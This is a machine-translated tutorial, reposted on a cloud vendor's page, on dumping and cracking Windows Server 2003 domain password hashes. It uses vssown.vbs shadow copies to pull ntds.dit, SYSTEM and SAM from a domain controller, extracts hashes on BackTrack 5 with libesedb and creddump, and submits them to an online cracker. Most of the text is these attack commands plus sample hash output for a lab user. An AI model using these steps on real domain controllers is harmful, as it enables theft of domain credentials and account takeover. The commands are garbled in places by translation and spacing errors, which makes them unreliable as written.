Offline broken win2003 domain account password

Source: Internet
Author: User
Tags domain server

offline broken win2003 domain account password

Many methods are spoken in the domestic website. To share with you the experience of my experimental success.

This is done by following the Tim 's article, which is linked as follows:

Http://pauldotcom.com/2011/11/safely-dumping-hashes-from-liv.html

a experimental environment:windows server2003, domain environment

Construction method is very simple, Baidu search search.

Preparation Tool: Vssown.vbs,bt5,ntds_dump_hash.zip

Vssown.vbs Online Search

Http://www.ntdsxtract.com/downloads/ntds_dump_hash.zip

http://ftp.halifax.rwth-aachen.de/backtrack/BT5R1-GNOME-VM-32.7z

Create a new domain user Xiaocaiwith the password set to 123abcabc

two win2003 under Extract Files

1, copy the Vssown.vbs to the domain server, such as copy to the desktop of the domain server.

2. Run cmd as Administrator and perform the following name:

CD Desktop

cscript//nologo vssown.vbs/start enabled

cscript//nologo vssown.vbs/status view run status

cscript//nologo vssown.vbs/create C Create a snapshot

cscript//nologo vssown.vbs/list View the snapshot information created

Here you can see the path inside the system, copying two Ntds.dit and system files to the desktop, where [X] is replaced with 5 .

Copy \\?\globalroot\device\harddiskvolumeshadowcopy[x]\windows\ntds\ntds.dit

Copy \\?\globalroot\device\harddiskvolumeshadowcopy[x]\windows\system32\config\system

Copy \\?\globalroot\device\harddiskvolumeshadowcopy[x]\windows\system32\config\sam

The extraction will be over on the file. There are often failures when trying here. There is no time to find information on what is the cause.

Delete the snapshot (this step is optional, it is recommended to delete)

cscript//nologo Vssown.vbs/delete {b3475a72-86d2-48ec-a22f-6e8dbb82903d}

Copy the 3 generated files.

three Extract HASH

Download the tool first, BT5, I'm using this virtual machine mirror phase

VMware Mirror 32-bit: http://ftp.halifax.rwth-aachen.de/backtrack/BT5R1-GNOME-VM-32.7z

Default login Password: Root/toor

Open SSH Service: (can be accessed with Se Cure CRT after opening service , convenient for file transfer)

Ssh-keygen-t rsa-f/etc/ssh/ssh_host_rsa_key

Ssh-keygen-t dsa-f/etc/ssh/ssh_host_dsa_key

Sshd-generate

/etc/init.d/ssh restart

A little off.

View IP with ifconfig

then use SeCure CRT access,

Press Alt+p open sftp and upload the file to/tmp

Cd/tmp

Put SYSTEM Ntds.dit Ntds_dump_hash.zip

Switch to BT5 System Label

CD/ tmp

Ls

# Unzip Ntds_dump_hash.zip

Unzip Ntds_dump_hash.zip

# Compile Libesedb

CD Libesedb

chmod +x Configure

./configure && Make

# Interpreting data Files Ntds.dit

CD Esedbtools

./esedbdumphash. /.. /ntds.dit

# Extract Hash

Cd.. /.. /creddump/

Python./dsdump.py. /system. /libesedb/esedbtools/ntds.dit.export/datatable

Extracted, found,

xiaocai:1109:8a79528ccd6e0dbffcd6b8db0f458c37:3b0de00581a39a49946206e0998b7df7:::

Four Crack Hash

crack Hash method A lot, here use website crack. Put the bold part on the website. Crack:http://www.objectif-securite.ch/en/ophcrack.php

 

Contact Us

The content source of this page is from Internet, which doesn't represent Alibaba Cloud's opinion; products and services mentioned on that page don't have any relationship with Alibaba Cloud. If the content of the page makes you feel confusing, please write us an email, we will handle the problem within 5 days after receiving your email.

If you find any instances of plagiarism from the community, please send an email to: info-contact@alibabacloud.com and provide relevant evidence. A staff member will contact you within 5 working days.

A Free Trial That Lets You Build Big!

Start building with 50+ products and up to 12 months usage for Elastic Compute Service

  • Sales Support

    1 on 1 presale consultation

  • After-Sales Support

    24/7 Technical Support 6 Free Tickets per Quarter Faster Response

  • Alibaba Cloud offers highly flexible support services tailored to meet your exact needs.